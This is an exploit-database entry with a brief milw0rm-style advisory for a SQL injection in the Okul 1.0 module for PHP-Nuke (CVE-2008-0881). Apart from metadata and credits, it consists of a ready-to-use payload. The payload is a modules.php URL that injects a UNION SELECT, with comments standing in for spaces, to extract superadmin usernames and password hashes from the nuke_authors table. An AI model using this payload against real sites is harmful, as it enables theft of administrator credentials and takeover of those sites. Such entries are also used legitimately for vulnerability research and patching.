PHP-Nuke Modules Okul 1.0 - 'okulid' SQL Injection
Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2008-02-19
date_updated: 2016-11-11
verified: 1
codes: OSVDB-42266;CVE-2008-0881
tags:
aliases:
screenshot_url:
application_url:
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
PHP-NUKE Modules Okul v1.0 Remote SQL Injection
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Found: xoron
contact: xorontr@gmail.com (only e-mail)
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Exploit:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Thanx: str0ke, s@bun.
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
# milw0rm.com [2008-02-20]